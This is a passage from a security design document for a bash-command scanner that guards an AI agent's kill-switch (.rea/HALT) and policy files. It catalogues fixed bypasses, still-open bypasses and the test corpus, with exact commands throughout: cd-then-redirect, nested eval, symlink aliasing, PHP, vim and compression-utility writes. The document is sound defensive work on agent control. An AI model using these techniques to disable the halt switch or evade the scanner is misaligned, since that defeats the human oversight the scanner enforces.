small read-only allow-list (`cat`, `grep`, `head`, `wc`, etc.).
|
|
815
|
+
(b) `git rm -f .rea/HALT` and `git mv .rea/HALT /tmp/x` were
|
|
816
|
+
not in the `TRACKED` subcommand set; round-11 added explicit
|
|
817
|
+
branches with `--cached` carve-out for `git rm`. (c) `git
|
|
818
|
+
filter-branch --tree-filter PAYLOAD` and `git rebase --exec`
|
|
819
|
+
/ `-x` / `git bisect run` / `git commit --template=PATH` were
|
|
820
|
+
re-parse seams where git feeds PAYLOAD through `/bin/sh -c` at
|
|
821
|
+
runtime; round-11 added per-subcommand handlers feeding PAYLOAD
|
|
822
|
+
through `recurseShellPayload` → `parseBashCommand` →
|
|
823
|
+
`walkForWrites` (full top-level walker re-dispatch). (d)
|
|
824
|
+
archive extraction: `tar -xf x.tar -C . .rea/HALT` extracts the
|
|
825
|
+
protected member; `tar -xzf x.tgz` (no `-C`, no member list)
|
|
826
|
+
extracts every member — archive may contain `.rea/HALT`.
|
|
827
|
+
Round-11 fix: `detectTar` extended with extract-mode positional
|
|
828
|
+
harvesting, plus new `detectUnzip`/`detect7z`/`detectGzip`/
|
|
829
|
+
`detectPax` dispatchers. `bsdtar` aliases to `tar`. When -x is
|
|
830
|
+
set with no `-C` AND no explicit members, emit
|
|
831
|
+
`archive_extract_unresolvable`. (e) `echo .rea/HALT | parallel
|
|
832
|
+
rm` reads input from stdin (no `:::`); round-11 added pre-strip
|
|
833
|
+
detection in `walkCallExpr` that emits
|
|
834
|
+
`parallel_stdin_unresolvable` when parallel head has positional
|
|
835
|
+
template tokens AND no `:::`/`::::`/`:::+`/`::::+` separator.
|
|
836
|
+
(f) `fakeroot`/`flock`/`gtimeout`/`unshare`/`env --chdir=`/
|
|
837
|
+
`sudo -s --` were not stripped by `stripEnvAndModifiers`;
|
|
838
|
+
round-11 added each wrapper with appropriate flag arity
|
|
839
|
+
handling, plus shell-mode `sudo -s --` synthesis to `sh -c
|
|
840
|
+
PAYLOAD`. (g) `php -r CODE` was missing from interpreter
|
|
841
|
+
dispatch; round-11 added `PHP_EVAL_FLAGS` (-r, --run) and
|
|
842
|
+
`PHP_WRITE_PATTERNS` covering `unlink`/`file_put_contents`/
|
|
843
|
+
`rename`/`copy`/`fopen` (write modes)/`mkdir`/`rmdir`/`touch`/
|
|
844
|
+
`chmod`/`chown`/`chgrp`/`symlink`/`link`/`move_uploaded_file`.
|
|
845
|
+
Class U (round-11 find/git/archive/parallel — 360 positives +
|
|
846
|
+
17 negatives) and Class V (round-11 wrappers + PHP — 124
|
|
847
|
+
positives + 8 negatives) pin the closure.
|
|
848
|
+
- adjacent-utility / cumulative-parity gaps (codex round 12
|
|
849
|
+
F12-1..F12-9 — nine INDEPENDENT findings against the round-11
|
|
850
|
+
surface). Not variants of any prior round; each landed in
|
|
851
|
+
PHP / archive-create / cmake / mkfifo+mknod / find-write-
|
|
852
|
+
predicate space where round-11 had not applied the cumulative
|
|
853
|
+
discipline established by earlier rounds. (a) F12-1 P0:
|
|
854
|
+
PHP `rename(SRC, DEST)` SOURCE-side blindspot — round-4 F3
|
|
855
|
+
established mv-shape source IS destructive; round-11 bundled
|
|
856
|
+
PHP rename with the destination-only group, so SRC slipped
|
|
857
|
+
past. Round-12 fix: split rename into TWO patterns + add
|
|
858
|
+
`rename(` to DESTRUCTIVE_API_TOKENS. (b) F12-2 P0: PHP
|
|
859
|
+
`rmdir(PATH)` not flagged destructive — bundled with mkdir/
|
|
860
|
+
touch (creates), so protected-ancestry never matched. Round-12
|
|
861
|
+
fix: split rmdir + add `rmdir(` to DESTRUCTIVE_API_TOKENS.
|
|
862
|
+
(c) F12-3 P0: PHP shell-out missing entirely —
|
|
863
|
+
`pickShellOutPatternsFor` had no php_r_path case. Round-12
|
|
864
|
+
fix: new PHP_SHELL_OUT_RE with quote-aware backref body
|
|
865
|
+
extraction covering system / exec / shell_exec / passthru /
|
|
866
|
+
popen / proc_open / backtick. (d) F12-4 P0: PHP -B/-E /
|
|
867
|
+
--process-begin / --process-end accept CODE same as -r;
|
|
868
|
+
round-11 PHP_EVAL_FLAGS only had -r/--run. Round-12 fix:
|
|
869
|
+
extend exactLong + shortChars (case-sensitive uppercase).
|
|
870
|
+
(e) F12-5 P0: archive CREATE direction missing — only EXTRACT
|
|
871
|
+
was checked. `tar -cf .rea/policy.yaml docs/`, `zip
|
|
872
|
+
.rea/policy.yaml docs/file`, `7z a .rea/policy.yaml docs/`
|
|
873
|
+
all silently overwrote the OUTPUT archive at the protected
|
|
874
|
+
path. Round-12 fix: detectTar gains isCreateOrAppend pass +
|
|
875
|
+
-f/-cf/--file emit; detect7z gains a/u/d compress branch;
|
|
876
|
+
new detectZip dispatcher (zip OUTPUT.zip [files...]).
|
|
877
|
+
(f) F12-6 P1: cmake -E utility surface — rm/remove/rename/
|
|
878
|
+
copy/copy_if_different/copy_directory/touch/remove_directory/
|
|
879
|
+
create_symlink/create_hardlink/make_directory all slipped past
|
|
880
|
+
pre-fix. Round-12 fix: new detectCmake with per-subcommand
|
|
881
|
+
argv shapes (cp-shape, mv-shape, variadic, second-positional).
|
|
882
|
+
(g) F12-7 P1: mkfifo / mknod create special files at protected
|
|
883
|
+
paths; no dispatchers existed. Round-12 fix: new detectMkfifo
|
|
884
|
+
(variadic) and detectMknod (NAME is first bare positional).
|
|
885
|
+
(h) F12-8 P1: find write-predicates -fls / -fprint / -fprintf
|
|
886
|
+
not in detectFind. Round-12 fix: scan for these predicates
|
|
887
|
+
and emit FILE as destructive write target (-fprintf consumes
|
|
888
|
+
TWO args). (i) F12-9 P2 false-positive regression: detectUnzip
|
|
889
|
+
emitted dynamic unresolvable for read-only flags `-p` (extract
|
|
890
|
+
to stdout), `-l/-Z/-t/-v/-z` (list/test/verbose/comment).
|
|
891
|
+
Round-12 fix: early-return ALLOW from detectUnzip when any
|
|
892
|
+
read-only flag (or cluster char) present. Class W (round-12
|
|
893
|
+
closures — 173 positives + 18 negatives) pins the closure.
|
|
894
|
+
- **cwd-relative-write kill-switch defeat** (helix-024 F1, P1
  closed in 0.23.1). `cd .rea && echo > HALT`,
  `cd .husky && echo > pre-push`, `(cd .rea && echo > HALT)`,
  `pushd .rea && echo > HALT`, `echo x | (cd .rea && tee HALT)`,
  and `p=.rea; cd $p && echo > HALT` all defeated 0.23.0. Pre-fix, the
  walker emitted only the relative redirect target (`HALT`); the
  scanner normalized `HALT` against REA_ROOT and got `HALT`,
  which doesn't match `.rea/HALT`. The cd was structurally
  invisible; the walker source explicitly documented this limit.
  Closure: a new `detectCwdChangeIntoProtected` post-walker pass
  scans the AST a second time for `cd`/`pushd` CallExprs and
  emits a synthetic `cwd_protected_unresolvable` (literal target;
  the scanner runs the protected-prefix test with
  `forceDirSemantics: true`) or `cwd_dynamic_with_writes_unresolvable`
  (dynamic target; refuse on uncertainty) under a four-rule
  refined predicate (round-14 codex P1 over-correction fix,
  tightened in the round-15 closure below):
  1. Writes must be in scope of the cd: sequential successors
     in the same StmtList, or the BinaryCmd.Y subtree of the cd's
     BinaryCmd.X, or nested compound stmts of those, NOT unrelated
     parallel stmts.
  2. Writes must be bare-relative in path shape (absolute /
     tilde / outside-root sentinels are unaffected by cwd).
  3. A dynamic cd with a known-safe source is treated as ALLOW. The
     known-safe set is intentionally narrow: NO env-var name
     qualifies (round-15 P1 closure: `$HOME`/`$PWD`/`$OLDPWD` are
     rebindable via inline assignment-prefix or parent-shell export,
     and `$OLDPWD` tracks any previous cd, including into protected
     dirs); the only ParamExp source that is known-safe is a for-iter
     variable bound to all-literal-non-protected Items. Known-safe
     cmdsubst sources are `$(pwd)` and `$(git rev-parse <flag>)`
     with flag in
     `{--show-toplevel, --show-cdup, --show-superproject-working-tree}`,
     flags that resolve to absolute paths or paths stepping OUT of cwd.
     `$(git rev-parse --show-prefix)` is NOT known-safe (round-15 P1
     closure: it returns the cwd-relative path INSIDE the toplevel, so
     when the agent is already in `.rea/` it returns `.rea/`).
  4. A dynamic cd without bare-relative writes in scope emits nothing.

  Caught: literal protected cd + bare-relative writes in any nested scope,
  and dynamic cd with unknown / env-var / show-prefix source +
  bare-relative write in scope. Accepted false negatives
  (out of scope for the hotfix, tracked for 0.24.0):
  `cd $(echo .rea)` cmdsubst-resolved literals,
  `alias evil="..."; evil` alias-then-invoke, and for-iter loops
  whose Items list is a cmdsubst.
- **doubly/N-nested eval bypass** (helix-024 F2, P1 closed in
  0.23.1). `eval "eval \"echo > .rea/HALT\""` defeated 0.23.0.
  Pre-fix, `detectEval` re-parsed exactly one level. The outer
  DQ-significant escapes (`\"`) survived as literal backslash-quote
  pairs into the joined inner string, corrupting the second-level
  redirect target (`.rea/HALT\"`) so it didn't match the
  protected list. This is the same shape as the helix-022 #3
  nested-bash-c DQ-escape bypass, where `unshellEscape` collapses one
  level of DQ-escapes before re-parse. Closure: two-part fix. (1)
  unshellEscape the inner string before re-parsing in detectEval
  (parity with detectNestedShell). (2) New `EVAL_DEPTH_CAP = 8`
  counter mirroring NESTED_SHELL_DEPTH_CAP; past the cap the
  walker emits a synthetic dynamic detection. Eval and bash -c
  use SEPARATE counters so a heavy mix doesn't exhaust one
  budget through the other. Single-level `eval "echo > .rea/HALT"`
  continues to BLOCK (no regression).
- **symlink-alias-write kill-switch defeat** (helix-024 F3, P1
  closed in 0.23.1). `ln -sf .rea/HALT /tmp/_x && echo y > /tmp/_x`
  exited 0 in 0.23.0. The static walker doesn't track
  filesystem state across statements; the first statement stages
  a symlink whose target is protected, the second writes through
  the link. Neither token in isolation references a protected
  write target: `ln`'s SRC was just a positional, and DEST was
  unprotected. Closure: detectLn emits a synthetic
  `ln_to_protected_unresolvable` detection on every SRC positional
  in both `ln SRC DEST` and `ln -t DEST_DIR SRC1 ...` forms. The
  detection carries `isDestructive: true` so protected-ancestry
  matches bare-dir SRCs (`ln -s .rea /tmp/_x` aliases the .rea
  directory). Dynamic SRC emits the dynamic form. Class X
  (helix-024 closures: 234 positives + 16 negatives) pins all
  three closures. Related class deferred to 0.24.0:
  alias-then-invoke (`alias evil="echo > .rea/HALT"; evil`)
  requires modeling shell aliases at AST time.
- **env-var rebind + `--show-prefix` cwd-eval bypass**
  (helix-024 round-15 P1, closed in 0.23.1). Round-14's
  `detectCwdChangeIntoProtected` refined predicate ALLOWed dynamic
  cd whose source was an env-var ParamExp from
  `{HOME, PWD, OLDPWD}` or a cmdsubst from
  `git rev-parse --show-prefix`. Both classes are
  attacker-controllable. (1) Env
  vars rebind via inline assignment-prefix on the same simple
  command (`HOME=.rea cd "$HOME" && echo > HALT`) and via
  parent-shell exports across commands
  (`export HOME=.rea; cd "$HOME" && echo > HALT`); `OLDPWD`
  automatically tracks any
  previous cd, so a prior cd into a protected dir poisons later
  `cd "$OLDPWD"`. (2) `git rev-parse --show-prefix` returns the
  cwd-relative path INSIDE the toplevel; when the agent's cwd is
  already `.rea/`,
  `cd "$(git rev-parse --show-prefix)" && echo > HALT`
  lands inside `.rea/` with a `HALT` write target that
  resolves against `.rea/HALT`. Closure: empty `KNOWN_SAFE_VARS`
  in `isParamExpKnownSafe` (no env-var name is statically safe;
  the for-iter carve-out remains because Items literals are
  statically checked); drop `--show-prefix` from the
  `isCmdSubstKnownSafe` FLAGS allow-list (the remaining flags
  `--show-toplevel`, `--show-cdup`,
  `--show-superproject-working-tree` resolve to absolute paths or
  paths stepping OUT of cwd, never INTO it). Class X corpus
  rehomes: 3 fixtures moved from R14_ALLOW to R14_BLOCK
  (`cd "$HOME"` / `cd "$OLDPWD"` / `pushd "$HOME"` with bare
  writes), 4 new BLOCK fixtures pin the round-15 PoCs
  (`HOME=.rea cd "$HOME"`, `PWD=.rea cd "$PWD"`,
  `cd "$(git rev-parse --show-prefix)"`,
  `export HOME=.rea; cd "$HOME"`). Single-level eval,
  ln-source-protected, and the literal `cd .rea` path remain
  unchanged. As
  a side improvement under round-15 P3, `.github/workflows/` is
  added to the historical default protected list so consumers
  without an explicit `policy.blocked_paths` entry still refuse
  Bash-tier writes to CI workflows; the path is intentionally NOT
  a kill-switch invariant, and operators may relax it via
  `policy.protected_paths_relax`.

  Round-16 closure (helix-024
  hotfix continued, sibling threat class to round-15 F1) extends
  the refuse-on-uncertainty path to bare `cd` (defaults cwd to
  `$HOME`), `cd -L` / `cd -P` (flag-only, also default to
  `$HOME`), `cd -` (reverts to `$OLDPWD`), and `popd` (reverts
  to dir-stack head): all four forms emit no positional after
  flag-skip and previously fell through with no detection. They
  now run the same in-scope bare-relative-write check as the
  dynamic-target branch and emit
  `cwd_dynamic_with_writes_unresolvable` if a bare-relative write
  is in scope. 5 new R16_BLOCK fixtures + 4 R16-shape negatives
  were added to the Class X corpus.

  Round-17 closure (helix-024 hotfix continued, P1 + P2 + P3 +
  P3-doc; a control-flow walker gap, NOT a predicate weakness): the
  round-14/15/16 walker visited a conditional's Cond and Body as
  separate scopes via `walkScopeForCwd`. A `cd` inside the Cond
  therefore had a single-command scope with no successors, never
  collected the body's writes as downstream, and never emitted,
  even though bash semantics keep the cwd change in the current
  shell so it persists into the Body when the cond is truthy AND
  past the conditional into post-stmt siblings. Closure: thread an
  `extraDownstream` parameter through `walkScopeForCwd` →
  `classifyCdInStmt` → `collectCdSitesInStmt` /
  `collectCdSitesInBinaryX`. When `descendCmdScopes` enters an
  IfClause/WhileClause/UntilClause, the Cond walk receives
  `[...body, ...post-stmt-siblings]` as carriers; the Body walk receives
  `[...post-stmt-siblings]`. Subshell stays cwd-isolated (it forks a
  child shell) so its inner walk does NOT inherit parent siblings.
  The same closure adds explicit `TimeClause` / `CoprocClause`
  cases to `descendCmdScopes` (descend into the wrapped Stmt with
  carriers) and a TimeClause/CoprocClause unwrap in
  `collectCdSitesInBinaryX` so `time cd .rea && echo > HALT`
  reaches the cd site. `pushd` no-positional / `pushd -N` /
  `pushd +N` already BLOCK incidentally via the round-16 fallback
  (runtime-determined dir-stack manipulation refused on uncertainty),
  but R17 P3 pins the verdict with three explicit fixtures so a
  future predicate relaxation cannot silently re-open the bypass.
  12 new R17_BLOCK fixtures + 3 R17_ALLOW negatives were added to the
  Class X corpus, including the pragmatic-bound ALLOW for
  `pushd && cat README.md` (no bare-relative WRITE in scope),
  `if cd /tmp; then echo > log; fi` (literal non-protected cd target;
  the protected-prefix test ALLOWS), and
  `if cd .rea; then cat HALT; fi` (read-only body; the predicate
  requires a WRITE).
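
The cwd-relative defeat described in the list above comes down to which directory a bare-relative write target is resolved against. The following is a minimal sketch of that effect, not the scanner's code: `PROTECTED`, `normalize`, and `isProtected` are hypothetical names introduced for illustration, and the protected list is a made-up subset.

```typescript
// Illustrative only: PROTECTED, normalize, and isProtected are hypothetical
// stand-ins and do not mirror the real scanner API.
const PROTECTED: string[] = [".rea/HALT", ".rea/policy.yaml", ".husky/"];

// Resolve a bare-relative `target` against `cwd` (itself relative to the
// project root) and collapse "." / ".." segments.
// Absolute and tilde targets are out of scope for this sketch.
function normalize(cwd: string, target: string): string {
  const out: string[] = [];
  for (const seg of `${cwd}/${target}`.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") out.pop();
    else out.push(seg);
  }
  return out.join("/");
}

// Entries ending in "/" protect a whole directory; others match exactly.
function isProtected(rootRelative: string): boolean {
  return PROTECTED.some((p) =>
    p.endsWith("/") ? `${rootRelative}/`.startsWith(p) : rootRelative === p
  );
}

// Pre-fix view: the cd is invisible, so HALT resolves against the root.
const preFix = normalize(".", "HALT");
// Post-fix view: the literal cd target is taken into account.
const postFix = normalize(".rea", "HALT");

console.log(preFix, isProtected(preFix));
console.log(postFix, isProtected(postFix));
```

With the cd ignored, the target stays `HALT` and misses the protected list; once the cd target is folded in, the same write resolves to `.rea/HALT` and matches.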
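
The nested-eval closure in the list above has two parts: collapse double-quote escapes before each re-parse, and cap the recursion depth. The sketch below illustrates both under loud assumptions: a regular expression stands in for the real AST re-parse, and `peelEval` and `redirectTarget` are hypothetical helpers. Only the names `unshellEscape` and `EVAL_DEPTH_CAP` and the cap value 8 come from the text.

```typescript
// Hypothetical sketch: a regex stands in for the real AST re-parse.
const EVAL_DEPTH_CAP = 8; // value taken from the text above

// Collapse the escapes that are significant inside double quotes:
// \$  \`  \"  \\  and backslash-newline (a line continuation).
function unshellEscape(s: string): string {
  return s.replace(/\\([$`"\\\n])/g, (_m, c: string) => (c === "\n" ? "" : c));
}

type Peeled = { dynamic: true } | { dynamic: false; command: string };

// Peel `eval "..."` wrappers one level at a time. `collapse` toggles the
// escape-collapsing step so the pre-fix behaviour can be reproduced.
function peelEval(command: string, collapse: boolean, depth = 0): Peeled {
  if (depth > EVAL_DEPTH_CAP) return { dynamic: true }; // refuse on uncertainty
  const m = /^eval\s+"((?:[^"\\]|\\[\s\S])*)"$/.exec(command.trim());
  if (m === null) return { dynamic: false, command };
  const body = m[1] ?? "";
  return peelEval(collapse ? unshellEscape(body) : body, collapse, depth + 1);
}

// First redirect target in a command, if any.
function redirectTarget(command: string): string | undefined {
  return /> *(\S+)/.exec(command)?.[1];
}

const poc = 'eval "eval \\"echo > .rea/HALT\\""';
const fixed = peelEval(poc, true);
const preFixEval = peelEval(poc, false);

console.log(fixed.dynamic ? "dynamic" : redirectTarget(fixed.command));
console.log(preFixEval.dynamic ? "dynamic" : redirectTarget(preFixEval.command));
```

With collapsing enabled the innermost target comes out as `.rea/HALT`; without it the target keeps the stray backslash-quote and no longer matches, which is the corruption the bullet describes.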

### 8.3 Bypass classes still possible

- **`mvdan-sh@0.10.1` deprecation advisory** (helix-024 F4, P2
  acknowledged residual, surfaced 2026-05-04). The 0.23.0 upgrade
  introduced `mvdan-sh@0.10.1` as a transitive runtime dependency
  at the security boundary. The package is the JavaScript port of
  mvdan's Go shell parser and is upstream-deprecated per
  https://github.com/mvdan/sh/issues/1145 (the Go original is
  actively maintained; the JS port is on hold). The deprecation
  is a code-freeze, not a removal. Mitigations already in place:
  (1) integrity hash pinned in pnpm-lock.yaml, (2) the project
  fails closed on parser anomalies (parse errors → refuse on
  uncertainty), (3) the Class O exhaustiveness contract pins the
  walker against any latent field-gap. A future mvdan-sh
  migration / replacement is out of scope for the helix-024
  hotfix; tracked for 0.24.0 evaluation. Listed as still-possible
  rather than structurally-impossible because the security model
  binds rea to a deprecated parser at the AST boundary.
- **`@bookedsolid/rea` package-tier supply-chain compromise** (codex
  round 5 F5, P1/P3 acknowledged residual). The bash-tier shim's
  CLI-resolution sandbox check (codex round 4 #2 + round 5 F2)
  defeats node_modules-symlink-out and workspace-bin hijack. It does
  NOT defeat an attacker who can write a forged
  `node_modules/@bookedsolid/rea/dist/cli/index.js` *and* a matching
  `node_modules/@bookedsolid/rea/package.json` with
  `name === "@bookedsolid/rea"` directly inside the project's
  `node_modules/`.
  Such an attacker has already compromised the package install
  pipeline (e.g. via a compromised lockfile / dependency-confusion
  attack / npm registry compromise). At that level the attacker can
  also forge any other dependency the agent uses, so hook-tier defense
  is moot: the trust boundary is the `npm install` provenance check
  (npm provenance + manifest verification) rather than the bash gate.
  Hardening (opt-in): operators may set `policy.review.cli_sha256: <hex>`
  in `.rea/policy.yaml` and the shim will refuse if the resolved CLI's
  SHA-256 does not match. Defaults to unset; documented as an opt-in
  belt-and-braces measure rather than a structural defense (see
  `docs/architecture/bash-scanner.md` for the full rationale).
- **`git checkout REVISION PATH` and `git restore --source=REVISION PATH`
  without the POSIX `--` argv separator** (codex round 9 F3,
  accepted false negative since 0.22.0). When an attacker invokes
  `git checkout main .rea/HALT` (or
  `git restore --source=HEAD~1 .rea/policy.yaml`), git's pre-`--`
  argv shape is structurally
  ambiguous between "REVISION PATH" and "PATH...". The `detectGit`
  walker conservatively treats positionals after the subcommand as
  destructive-overwrite targets ONLY when `--` is present, because
  disambiguation requires a runtime ref-existence check that the
  static walker cannot perform without filesystem I/O. Workaround:
  the kill-switch invariants for protected files (`.rea/HALT`,
  `.rea/policy.yaml`, `.claude/settings.json`, etc.) are still caught
  by the symlink-resolution layer in `protected-paths-bash-gate.sh`
  at file-write time when git actually opens the destination for
  write; the bash-scanner's static layer is one of multiple
  enforcement points. Pin: 0.24.0 milestone for a comprehensive fix
  (likely a conservative refusal whenever the first positional
  matches a known git-revspec shape AND following positionals exist).
- glob expansion in argv-based commands (`chmod +x bin/*.sh` on a
  filesystem where `bin/.rea` exists). Glob detection is scoped to
  redirect-form targets only because argv-globs in legitimate code
  are common. Future: enumerate filesystem-level glob matches.
- awk `-f script-file` body. We currently emit a dynamic detection
  (refuse on uncertainty). Future: read + scan the file.
- semantic obfuscation via `${!ind}` indirect expansion, `read -p`
  prompts, computed-property attacks in interpreter payloads that
  evade the flat-scan heuristic. These are parse-correct and the
  detector is best-effort.
- WASM `sh-syntax` migration risk: parser bugs in the new library
  could reopen bypass classes. Mitigated by the corpus fixture
  suite (every closed bypass replays as a positive regression
  test).
- **Round-13 deferred to 0.24.0** (utility-enumeration completeness;
  same shape as round 12, and convergence at this tier is asymptotic
  per codex's explicit assessment):
  1. **PHP indirect-callable shell-out**:
     `array_map("system", [...])`, `call_user_func("system", ...)`,
     `eval("system(...);")`, variable-bound callable
     `$f = "system"; $f(...)`. Round 12 closed direct calls;
     indirect callable forms remain.
  2. **vim/emacs editor exec re-parse seam**: `vim -c "!cmd"`,
     `vim -c "w PATH"`, `vim -c "source PATH"`,
     `emacs --eval "(shell-command \"...\")"`,
     `emacs --eval "(delete-file \"...\")"`. No vim/emacs dispatcher
     in 0.23.0.
  3. **Standalone compression utilities**: `xz -o FILE`,
     `zstd -o FILE`, `lz4 INPUT FILE`, `lzma -o FILE`. Round 12
     closed tar/zip/7z/cpio/pax create-direction; the adjacent
     standalone compression family remains open.
  4. **Image-builder utilities**: `mksquashfs INPUT OUTPUT`,
     `genisoimage -o OUTPUT`, `mkisofs -o OUTPUT`,
     `xorriso -outdev OUTPUT`. CI/build pipelines use these.
  5. **`7zz` Linux-canonical 7zip alias**: `detect7z` only fires
     on `7z`; the official Linux package binary is `7zz`.
  6. **Python argv-form subprocess**: `subprocess.Popen(['rm', '...'])`,
     `subprocess.run(['rm', '...'])` etc. without
     `shell=True`. Round 3 F5 closed the `shell=True` form;
     the argv-list form is still allowed.
  7. **vim ex-mode literal-path write** (P2): `vim -c "w PATH"`
     writes literally with PATH in argv, a regex-level miss
     independent of the broader `-c` re-parse seam.
- **Denylist scanner is structurally limited** (acknowledged by
  codex round 4 and reaffirmed by codex round 13: "convergence on
  enumeration completeness is asymptotic — every round will probably
  find more"). A denylist enumerates the destructive shapes the
  scanner knows. Novel shapes (interpreters or utilities not yet
  modeled, language constructs we haven't seen) can in principle
  bypass until added. Defense in depth:
  1. mvdan-sh AST parsing eliminates an entire class of
     regex/segmenter mistakes.
  2. Comprehensive walker dispatchers per known destructive utility +
     per known shell-out + per known interpreter API.
  3. Adversarial corpus generators span the parameter cross-product
     so generators produce shapes Codex hasn't visited.
  4. Per-round Codex review surfaces gaps before release; the
     convergence ladder
     (round 1 → round 2 → round 3 → round 4 → round 5 ...) is the
     audit trail.
  5. Fail-closed defaults: dynamic targets always block.

  An allowlist scanner ("only known-safe commands pass") would close
  this class structurally but is incompatible with the rea use case
  (agentic workflows need arbitrary bash access).
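
The opt-in `policy.review.cli_sha256` hardening mentioned in the supply-chain item above amounts to hashing the resolved CLI and comparing against the pinned digest. A minimal sketch, assuming the shim has the CLI bytes in hand; `cliMatchesPin` is a hypothetical helper, and treating an unset pin as "no check" follows the "defaults to unset" wording rather than any confirmed implementation.

```typescript
import { createHash } from "node:crypto";

// Hypothetical helper: compares the SHA-256 of the resolved CLI's bytes
// with the operator-pinned hex digest. An unset pin means "no check",
// matching the opt-in default described above.
function cliMatchesPin(cliBytes: Uint8Array | string, pinnedHex?: string): boolean {
  if (pinnedHex === undefined) return true;
  const actual = createHash("sha256").update(cliBytes).digest("hex");
  return actual === pinnedHex.trim().toLowerCase();
}

// Usage: the pin would come from `.rea/policy.yaml`; here it is inlined.
const pin = "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad";
console.log(cliMatchesPin("abc", pin));
console.log(cliMatchesPin("abd", pin));
```

A real check would read the file at the resolved CLI path; the string input here only keeps the sketch self-contained.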
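
The `git checkout` / `git restore` false negative described in the list above can be pictured with a small classifier. This is a simplified sketch of the stated rule (targets are reported only when `--` is present), not the `detectGit` implementation; `gitOverwriteTargets` is a hypothetical name and flags are not parsed.

```typescript
// Hypothetical sketch of the accepted false negative: positionals are
// reported as overwrite targets only when the `--` separator is present.
function gitOverwriteTargets(argv: string[]): string[] {
  const [cmd, sub, ...rest] = argv;
  if (cmd !== "git" || (sub !== "checkout" && sub !== "restore")) return [];
  const sep = rest.indexOf("--");
  // Without `--`, "REVISION PATH" and "PATH..." cannot be told apart
  // statically, so nothing is reported.
  return sep === -1 ? [] : rest.slice(sep + 1);
}

console.log(gitOverwriteTargets(["git", "checkout", "main", ".rea/HALT"]));
console.log(gitOverwriteTargets(["git", "checkout", "main", "--", ".rea/HALT"]));
```

The first call reports no targets (the documented gap); the second reports `.rea/HALT`.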

### 8.4 Test surface

The fixture corpus at
`__tests__/hooks/bash-tier-corpus.test.ts` (≥185 entries) and
`__tests__/hooks/bash-tier-corpus-round2.test.ts` (≥186 entries,
codex round 2 bypass-class fixtures) locks every documented bypass
class as a regression-positive test.
The walker unit tests at `__tests__/hooks/bash-scanner/walker.test.ts`
pin the parser-emitted RedirOperator codes (codex round 1 F-33) so a
parser-library bump that re-numbers them fails LOUDLY. The
verdict-shape snapshot at
`__tests__/hooks/bash-scanner/verdict-shape.test.ts`
locks the wire format for the bash shim consumers.

The cross-product corpus at
`__tests__/hooks/bash-scanner/adversarial-corpus.test.ts` runs ≥7700
fixtures across 18 classes (A–P plus extensions). Coverage assertion:
≥3000 positive (must-block) and ≥1000 negative (must-allow) fixtures.

The Class O exhaustiveness contract test at
`__tests__/hooks/bash-scanner/walker-exhaustiveness.contract.test.ts`
pins the walker reach across every Word-bearing AST position
mvdan-sh's parser populates. Round-8 tightened the acceptance to
path-explicit-by-default; opt-in `acceptDynamic` per row is the only
way to accept a `dynamic: true` write as proof-of-reach.

The bash-shim subprocess sampling at
`adversarial-corpus.test.ts > "bash shim subprocess sampling"`
spawns the actual hook script under a clean env across 100
deterministically sampled fixtures, parses the verdict JSON, and
cross-checks it against the in-process scan. This catches drift between
the in-process verdict and what the shim's JSON verifier + 4-tier
resolver chain actually returns.
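
The text does not say how the 100 fixtures are drawn deterministically. One common way, shown here purely as an assumption, is a seeded PRNG driving a partial Fisher-Yates shuffle; `seededRandom`, `sampleFixtures`, and the seed value are all hypothetical.

```typescript
// Small seeded PRNG (mulberry32-style). Hypothetical choice: the source
// does not state which generator, if any, the test suite uses.
function seededRandom(seed: number): () => number {
  let a = seed >>> 0;
  return () => {
    a = (a + 0x6d2b79f5) >>> 0;
    let t = a;
    t = Math.imul(t ^ (t >>> 15), t | 1);
    t ^= t + Math.imul(t ^ (t >>> 7), t | 61);
    return ((t ^ (t >>> 14)) >>> 0) / 4294967296;
  };
}

// Partial Fisher-Yates shuffle: the same seed always yields the same sample.
function sampleFixtures<T>(fixtures: readonly T[], count: number, seed: number): T[] {
  const pool = [...fixtures];
  const rand = seededRandom(seed);
  const n = Math.min(count, pool.length);
  for (let i = 0; i < n; i++) {
    const j = i + Math.floor(rand() * (pool.length - i));
    const tmp = pool[i] as T;
    pool[i] = pool[j] as T;
    pool[j] = tmp;
  }
  return pool.slice(0, n);
}

// Usage: 100 fixtures out of a (made-up) corpus of 7700 ids.
const corpus = Array.from({ length: 7700 }, (_, i) => `fixture-${i}`);
const sample = sampleFixtures(corpus, 100, 42);
console.log(sample.length);
```

A fixed seed keeps CI runs reproducible, so a shim/in-process mismatch always points at the same fixture.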

### 8.5 Defense in depth

The bash gate is one layer. The full defensive stack:

1. **Parser AST** (`mvdan-sh@0.10.1`): eliminates regex/segmenter
   tokenization mistakes.
2. **Walker** (`syntax.Walk`-based deny-by-default traversal +
   `recurseParamExpSlice` for Walk gaps): visits every node type;
   no Cmd-kind branch can silently drop a field.
3. **Per-utility dispatchers**: comprehensive coverage of cp, mv,
   sed, dd, tee, install, ln, awk, ed, ex, find, xargs, node,
   python, ruby, perl, tar, rsync, curl, wget, shred, eval, git,
   patch, sort, shuf, gpg, split, trap, bash/sh/zsh/dash/ksh.
4. **Interpreter scanners**: write-API tokens for node fs, python
   os/shutil/subprocess, ruby Pathname/FileUtils, perl unlink/rename;
   shell-out re-parse for `system`/`subprocess.run shell=True`/`qx`/
   backticks.
5. **DQ-escape parity**: `unshellEscape` collapses all 5 DQ-significant
   escapes (round-8) so the re-parser sees the same syntax tree as bash.
6. **Symlink resolver**: visited-set + depth cap (32); refuses on
   cycle/cap; macOS `/var` ↔ `/private/var` aliasing handled by
   `rea_resolved_relative_form` (helix-021).
7. **2-tier sandboxed CLI resolver**: only
   `node_modules/@bookedsolid/rea/dist/cli/index.js` and
   `dist/cli/index.js` accepted; `realpath` containment check
   refuses any escape from `CLAUDE_PROJECT_DIR`.
8. **Verdict JSON verifier**: shim re-parses CLI output via
   `node -e` and cross-checks exit code ↔ verdict (round-1 F-3).
9. **Cross-product corpus** (Classes A–P): ≥7700 fixtures span the
   parameter space so generators produce shapes the round-by-round
   manual review hadn't visited.
10. **Class O exhaustiveness contract**: pins every Word-bearing
    AST position so mvdan-sh upgrades cannot silently introduce
    Walk-skip bypasses.
11. **Codex adversarial review**: every release goes through
    `/codex-review` before merge; convergence ladder is the audit
    trail. 0.23.0 round count: 8 (and counting).
12. **Middleware audit log**: every tool invocation is hash-chained
    in `.rea/audit.jsonl` (append-only, tamper-evident).
13. **Codex push-gate** (0.11.0+): pre-push stateless review by
    GPT-5.4 (codex-auto-review) catches semantic concerns the static
    scanner cannot reason about.
